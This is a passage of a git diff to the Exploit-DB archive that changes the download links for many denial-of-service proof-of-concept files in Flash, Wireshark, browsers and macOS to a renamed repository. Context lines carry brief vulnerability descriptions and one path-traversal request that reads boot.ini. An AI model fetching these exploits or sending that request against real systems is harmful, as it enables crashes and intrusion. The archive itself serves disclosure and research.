+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41008.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/41012.txt b/exploits/multiple/dos/41012.txt index 7dbccf870..5200e6e43 100644 --- a/exploits/multiple/dos/41012.txt +++ b/exploits/multiple/dos/41012.txt @@ -60,6 +60,6 @@ structure that contain an invalid value in “ActionGetURL2” could lead to rem =========== https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41012.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41012.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/41163.txt b/exploits/multiple/dos/41163.txt index 84b6152ff..d8ba61c93 100644 --- a/exploits/multiple/dos/41163.txt +++ b/exploits/multiple/dos/41163.txt @@ -93,4 +93,4 @@ Exploit for iOS 10.2 iPod Touch 6G 14C92 gets kernel arbitrary r/w Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41163.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41163.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41420.txt b/exploits/multiple/dos/41420.txt index 24d805966..9c360b5ca 100644 --- a/exploits/multiple/dos/41420.txt +++ b/exploits/multiple/dos/41420.txt @@ -4,4 +4,4 @@ There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41420.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41420.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41421.txt b/exploits/multiple/dos/41421.txt index 0186dde81..c218fd7b6 100644 --- a/exploits/multiple/dos/41421.txt +++ b/exploits/multiple/dos/41421.txt @@ -4,4 +4,4 @@ The attached fuzzed swf causes stack corruption when it is loaded, likely due to Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41421.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41421.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41422.txt b/exploits/multiple/dos/41422.txt index 30c95de10..b43a0120c 100644 --- a/exploits/multiple/dos/41422.txt +++ b/exploits/multiple/dos/41422.txt @@ -4,4 +4,4 @@ The attached swf causes a use-after-free in applying bitmap filters. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41422.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41422.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41423.txt b/exploits/multiple/dos/41423.txt index a8888ba72..b7cb05f4c 100644 --- a/exploits/multiple/dos/41423.txt +++ b/exploits/multiple/dos/41423.txt @@ -6,4 +6,4 @@ To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41423.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41423.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41608.txt b/exploits/multiple/dos/41608.txt index 368a324b7..d05410a9b 100644 --- a/exploits/multiple/dos/41608.txt +++ b/exploits/multiple/dos/41608.txt @@ -4,4 +4,4 @@ The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41608.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41608.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41609.txt b/exploits/multiple/dos/41609.txt index 5bb492021..4365807eb 100644 --- a/exploits/multiple/dos/41609.txt +++ b/exploits/multiple/dos/41609.txt @@ -4,4 +4,4 @@ The attached file causes a use-after-free in attaching a MovieClip and applying Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41609.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41609.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41610.txt b/exploits/multiple/dos/41610.txt index 830760130..1ab3f81dd 100644 --- a/exploits/multiple/dos/41610.txt +++ b/exploits/multiple/dos/41610.txt @@ -4,4 +4,4 @@ The attached file causes an overflow in heap thumbnailing. To reproduce, place b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41610.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41610.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41611.txt b/exploits/multiple/dos/41611.txt index 7f3daa673..843d616e8 100644 --- a/exploits/multiple/dos/41611.txt +++ b/exploits/multiple/dos/41611.txt @@ -4,4 +4,4 @@ The attached file causes heap corruption when decompressing a planar block. To r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41611.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41611.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41612.txt b/exploits/multiple/dos/41612.txt index 03dddea31..1857bc39b 100644 --- a/exploits/multiple/dos/41612.txt +++ b/exploits/multiple/dos/41612.txt @@ -4,4 +4,4 @@ There is a heap overflow in AVC header slicing. To reproduce the issue, put the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41612.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41612.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41668.txt b/exploits/multiple/dos/41668.txt index a4e09e317..553c5049c 100644 --- a/exploits/multiple/dos/41668.txt +++ b/exploits/multiple/dos/41668.txt @@ -13,7 +13,7 @@ https://www.onvio.nl/nieuws/cve-2017-6192 POC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41668.png +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41668.png The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4 diff --git a/exploits/multiple/dos/41669.txt b/exploits/multiple/dos/41669.txt index e1e959767..3300aba57 100644 --- a/exploits/multiple/dos/41669.txt +++ b/exploits/multiple/dos/41669.txt @@ -12,7 +12,7 @@ https://www.onvio.nl/nieuws/cve-2017-6193 POC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41669.png +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41669.png In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values: diff --git a/exploits/multiple/dos/41905.txt b/exploits/multiple/dos/41905.txt index 0b6ac3126..be425216a 100644 --- a/exploits/multiple/dos/41905.txt +++ b/exploits/multiple/dos/41905.txt @@ -63,4 +63,4 @@ issue: "/** @todo validate this EMT claim... GVM knows. */") Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41905.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41905.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42017.txt b/exploits/multiple/dos/42017.txt index 2cf21f4f5..cfeccd527 100644 --- a/exploits/multiple/dos/42017.txt +++ b/exploits/multiple/dos/42017.txt @@ -4,4 +4,4 @@ The attached swf triggers an out-of-bounds read in AVC deblocking. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42017.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42017.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42018.txt b/exploits/multiple/dos/42018.txt index 5eb97758b..15d23d8c4 100644 --- a/exploits/multiple/dos/42018.txt +++ b/exploits/multiple/dos/42018.txt @@ -4,4 +4,4 @@ The attached fuzzed swf causes a crash due to heap corruption when processing th Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42018.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42018.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42019.txt b/exploits/multiple/dos/42019.txt index 4a07b0b3e..73ee84bef 100644 --- a/exploits/multiple/dos/42019.txt +++ b/exploits/multiple/dos/42019.txt @@ -4,4 +4,4 @@ The attached swf causes an out-of-bounds read in getting the width of a TextFiel Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42019.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42019.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42049.txt b/exploits/multiple/dos/42049.txt index 3286c0db0..70f7b977f 100644 --- a/exploits/multiple/dos/42049.txt +++ b/exploits/multiple/dos/42049.txt @@ -76,4 +76,4 @@ Binary file PhotoData/FacesMetadata/NVP_HIDDENFACES.hiddenfacemetadata matches Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42049.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42049.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42050.txt b/exploits/multiple/dos/42050.txt index 786b5d81e..6c2df66d5 100644 --- a/exploits/multiple/dos/42050.txt +++ b/exploits/multiple/dos/42050.txt @@ -12,4 +12,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42050.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42050.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42051.txt b/exploits/multiple/dos/42051.txt index 13ee2cf4c..38b6f81d2 100644 --- a/exploits/multiple/dos/42051.txt +++ b/exploits/multiple/dos/42051.txt @@ -41,4 +41,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42051.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42051.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42052.txt b/exploits/multiple/dos/42052.txt index 39d7cb33e..7f98427ad 100644 --- a/exploits/multiple/dos/42052.txt +++ b/exploits/multiple/dos/42052.txt @@ -17,4 +17,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42052.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42052.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42123.txt b/exploits/multiple/dos/42123.txt index fb95a710d..0b3aab82e 100644 --- a/exploits/multiple/dos/42123.txt +++ b/exploits/multiple/dos/42123.txt @@ -63,4 +63,4 @@ SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42123.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42123.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42124.txt b/exploits/multiple/dos/42124.txt index b7d3a256d..1abbe55f7 100644 --- a/exploits/multiple/dos/42124.txt +++ b/exploits/multiple/dos/42124.txt @@ -83,4 +83,4 @@ SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42124.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42124.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42245.txt b/exploits/multiple/dos/42245.txt index 4ec613c2b..92d5971ae 100644 --- a/exploits/multiple/dos/42245.txt +++ b/exploits/multiple/dos/42245.txt @@ -49,4 +49,4 @@ of their codebase which removed further issues. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42245.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42245.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42247.txt b/exploits/multiple/dos/42247.txt index 49929ae2f..d69de4f8a 100644 --- a/exploits/multiple/dos/42247.txt +++ b/exploits/multiple/dos/42247.txt @@ -4,4 +4,4 @@ The attached file causes an out-of-bounds read in avc edge processing. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42247.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42247.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42248.txt b/exploits/multiple/dos/42248.txt index 7d3e52128..8031bfaf7 100644 --- a/exploits/multiple/dos/42248.txt +++ b/exploits/multiple/dos/42248.txt @@ -6,4 +6,4 @@ http://127.0.0.1/LoadImage.swf=read1.png Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42248.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42248.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42249.txt b/exploits/multiple/dos/42249.txt index b35adda77..9c4869aed 100644 --- a/exploits/multiple/dos/42249.txt +++ b/exploits/multiple/dos/42249.txt @@ -4,4 +4,4 @@ The attached file causes heap corruption in the ATF parser. To reproduce the iss Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42249.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42249.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42286.txt b/exploits/multiple/dos/42286.txt index 6448bfc72..d8331a422 100644 --- a/exploits/multiple/dos/42286.txt +++ b/exploits/multiple/dos/42286.txt @@ -19,4 +19,4 @@ This PoC crashes on google-chrome-beta on Linux. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42286.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42286.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42781.txt b/exploits/multiple/dos/42781.txt index 9021e722b..5d66cd189 100644 --- a/exploits/multiple/dos/42781.txt +++ b/exploits/multiple/dos/42781.txt @@ -5,4 +5,4 @@ The attached MP4 file causes an out-of-bounds memory access when played in flash Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42781.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42781.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42782.txt b/exploits/multiple/dos/42782.txt index 0c57d0b43..1ac2bfcef 100644 --- a/exploits/multiple/dos/42782.txt +++ b/exploits/multiple/dos/42782.txt @@ -5,4 +5,4 @@ The attached fuzzed MP4 file causes an out-of-bounds memory access when played w Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42782.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42782.zip \ No newline at end of file diff --git a/exploits/multiple/dos/42783.txt b/exploits/multiple/dos/42783.txt index 0ce9af8b8..468e578f3 100644 --- a/exploits/multiple/dos/42783.txt +++ b/exploits/multiple/dos/42783.txt @@ -5,4 +5,4 @@ The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42783.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42783.zip \ No newline at end of file diff --git a/exploits/multiple/dos/43233.txt b/exploits/multiple/dos/43233.txt index 9106a547c..b149e6e17 100644 --- a/exploits/multiple/dos/43233.txt +++ b/exploits/multiple/dos/43233.txt @@ -25,4 +25,4 @@ Upgrade to Wireshark 2.4.3, 2.2.11 or later. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43233.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43233.zip \ No newline at end of file diff --git a/exploits/multiple/dos/43320.txt b/exploits/multiple/dos/43320.txt index 42f43fb64..986bd917b 100644 --- a/exploits/multiple/dos/43320.txt +++ b/exploits/multiple/dos/43320.txt @@ -33,4 +33,4 @@ See the README and kdbg.c for details. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43320.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43320.zip \ No newline at end of file diff --git a/exploits/multiple/dos/43325.txt b/exploits/multiple/dos/43325.txt index 657e8c171..5e63404c9 100644 --- a/exploits/multiple/dos/43325.txt +++ b/exploits/multiple/dos/43325.txt @@ -140,4 +140,4 @@ is very late and there's a *lot* of code which you can hit before it. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43325.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43325.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44082.txt b/exploits/multiple/dos/44082.txt index e9927349a..9f6d0fac7 100644 --- a/exploits/multiple/dos/44082.txt +++ b/exploits/multiple/dos/44082.txt @@ -217,4 +217,4 @@ We can see that any attempt to call a function with the wrong number of input pa The attached poc will crash under ASAN with the following stack-trace, and without ASAN during the free of the corrupted heap block. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44082.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44082.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44083.txt b/exploits/multiple/dos/44083.txt index 7865d1e00..051fef205 100644 --- a/exploits/multiple/dos/44083.txt +++ b/exploits/multiple/dos/44083.txt @@ -62,4 +62,4 @@ Originally reported without 90 day deadline as https://bugs.chromium.org/p/chrom Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44083.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44083.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44247.txt b/exploits/multiple/dos/44247.txt index 45413c473..d0ea65a2c 100644 --- a/exploits/multiple/dos/44247.txt +++ b/exploits/multiple/dos/44247.txt @@ -54,4 +54,4 @@ Telegram: https://t.me/kirill_wow Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44247.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44427.txt b/exploits/multiple/dos/44427.txt index ea0a6bb7f..715910bd1 100644 --- a/exploits/multiple/dos/44427.txt +++ b/exploits/multiple/dos/44427.txt @@ -13,4 +13,4 @@ The attached html file causes a crash in Safari, the wasm file is attached as we Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44427.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44427.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44491.txt b/exploits/multiple/dos/44491.txt index 1dd65fabb..77a7a516f 100644 --- a/exploits/multiple/dos/44491.txt +++ b/exploits/multiple/dos/44491.txt @@ -97,4 +97,4 @@ rsvg-convert version 2.42.2 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44491.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44491.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44526.txt b/exploits/multiple/dos/44526.txt index 1816c5114..c75baa610 100644 --- a/exploits/multiple/dos/44526.txt +++ b/exploits/multiple/dos/44526.txt @@ -4,4 +4,4 @@ This PoC crashes a little bit unreliably, it is the most reliable in the standal Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44526.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44526.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44527.txt b/exploits/multiple/dos/44527.txt index eabbf304e..6bc00e6f8 100644 --- a/exploits/multiple/dos/44527.txt +++ b/exploits/multiple/dos/44527.txt @@ -4,4 +4,4 @@ This PoC crashes a little bit unreliably, it is the most reliable in the standal Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44527.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44527.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44528.txt b/exploits/multiple/dos/44528.txt index 178176d34..042a38656 100644 --- a/exploits/multiple/dos/44528.txt +++ b/exploits/multiple/dos/44528.txt @@ -4,4 +4,4 @@ To reproduce, put the attached images on a webserver and vist: http://127.0.0.1? Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44528.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44528.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44529.txt b/exploits/multiple/dos/44529.txt index 7b032f1fc..76c3ac17c 100644 --- a/exploits/multiple/dos/44529.txt +++ b/exploits/multiple/dos/44529.txt @@ -4,4 +4,4 @@ This PoC crashes reliably in Firefox for Linux. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44529.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44529.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44849.txt b/exploits/multiple/dos/44849.txt index 98bcb3de4..91d122dff 100644 --- a/exploits/multiple/dos/44849.txt +++ b/exploits/multiple/dos/44849.txt @@ -75,4 +75,4 @@ Just run this PoC as root on MacOS for easy repro. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44849.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44849.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44862.txt b/exploits/multiple/dos/44862.txt index 4e67cc7d1..da0ffa42f 100644 --- a/exploits/multiple/dos/44862.txt +++ b/exploits/multiple/dos/44862.txt @@ -41,4 +41,4 @@ I have verified that this fix would prevent the crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44862.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44862.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44863.txt b/exploits/multiple/dos/44863.txt index de63c8186..bed521429 100644 --- a/exploits/multiple/dos/44863.txt +++ b/exploits/multiple/dos/44863.txt @@ -37,4 +37,4 @@ This issue affects any browser that supports VP9, and can be reached by loading Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44863.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44863.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45032.txt b/exploits/multiple/dos/45032.txt index 9467b3d5f..e4f88a0e0 100644 --- a/exploits/multiple/dos/45032.txt +++ b/exploits/multiple/dos/45032.txt @@ -15,4 +15,4 @@ document.write(location.href); Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45032.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45032.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45059.txt b/exploits/multiple/dos/45059.txt index 5558c21c7..5b05d39ac 100644 --- a/exploits/multiple/dos/45059.txt +++ b/exploits/multiple/dos/45059.txt @@ -117,4 +117,4 @@ To test using the attached PoC, either run chrome with --disable-gpu to force so Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45059.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45059.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45098.txt b/exploits/multiple/dos/45098.txt index 68b916298..834c006a3 100644 --- a/exploits/multiple/dos/45098.txt +++ b/exploits/multiple/dos/45098.txt @@ -160,4 +160,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45098.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45098.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45121.txt b/exploits/multiple/dos/45121.txt index 1fbdfe1f5..eb3a840ca 100644 --- a/exploits/multiple/dos/45121.txt +++ b/exploits/multiple/dos/45121.txt @@ -103,4 +103,4 @@ This issue affects any browser that supports VP8, and can be reached by loading Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45121.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45121.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45122.txt b/exploits/multiple/dos/45122.txt index eb206a3a5..bd56edb31 100644 --- a/exploits/multiple/dos/45122.txt +++ b/exploits/multiple/dos/45122.txt @@ -73,4 +73,4 @@ To reproduce this issue: 3) run video_replay --input_file fallbackoob1 --config_file config4.txt Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45122.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45122.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45123.txt b/exploits/multiple/dos/45123.txt index 0d79c0ca5..161d2ff0a 100644 --- a/exploits/multiple/dos/45123.txt +++ b/exploits/multiple/dos/45123.txt @@ -50,4 +50,4 @@ Adding stack trace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45123.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45123.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45443.txt b/exploits/multiple/dos/45443.txt index ec6093408..b3e9b4f88 100644 --- a/exploits/multiple/dos/45443.txt +++ b/exploits/multiple/dos/45443.txt @@ -151,4 +151,4 @@ To reproduce the issue: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45443.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45443.zip \ No newline at end of file diff --git a/exploits/multiple/dos/45444.txt b/exploits/multiple/dos/45444.txt index 97cf41ac9..4a4bfd137 100644 --- a/exploits/multiple/dos/45444.txt +++ b/exploits/multiple/dos/45444.txt @@ -173,4 +173,4 @@ To reproduce this issue: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45444.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45444.zip \ No newline at end of file diff --git a/exploits/multiple/dos/4601.txt b/exploits/multiple/dos/4601.txt index 9343040e2..545d57daf 100644 --- a/exploits/multiple/dos/4601.txt +++ b/exploits/multiple/dos/4601.txt @@ -1,6 +1,6 @@ Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit Author: RoMaNSoFt -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) # milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/exploits/multiple/dos/5229.txt b/exploits/multiple/dos/5229.txt index 0a3832a43..05a5ff493 100644 --- a/exploits/multiple/dos/5229.txt +++ b/exploits/multiple/dos/5229.txt @@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500. http://aluigi.org/poc/asgulo.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5229.zip (2008-asgulo.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5229.zip (2008-asgulo.zip) A] http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini diff --git a/exploits/multiple/dos/6029.txt b/exploits/multiple/dos/6029.txt index d09481b9d..923a22629 100644 --- a/exploits/multiple/dos/6029.txt +++ b/exploits/multiple/dos/6029.txt @@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected It is unknown at this time whether code execution is possible... """ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6029.zip (2008-www.NoiseBridge.net.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6029.zip (2008-www.NoiseBridge.net.zip) # milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/exploits/multiple/dos/6174.txt b/exploits/multiple/dos/6174.txt index ad31c5dba..12792ba8f 100644 --- a/exploits/multiple/dos/6174.txt +++ b/exploits/multiple/dos/6174.txt @@ -17,6 +17,6 @@ your scanner hanging, woops. -- kokanin -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6174.zip (2008-snot.zip.bla) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6174.zip (2008-snot.zip.bla) # 